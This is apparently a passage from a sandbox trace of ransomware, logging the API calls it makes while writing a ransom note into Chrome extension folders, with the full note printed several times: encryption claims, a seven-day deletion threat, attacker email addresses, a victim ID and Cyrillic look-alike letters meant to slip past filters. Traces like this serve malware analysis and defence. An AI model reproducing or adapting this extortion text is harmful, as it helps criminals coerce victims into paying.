r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0272.530] WriteFile (in: hFile=0x2c8, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0272.530] CloseHandle (hObject=0x2c8) returned 1 [0272.531] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\#readme_eman#.rtf")) returned 0xffffffff [0272.531] GetLastError () returned 0x2 [0272.531] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0272.531] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0272.531] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0272.532] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 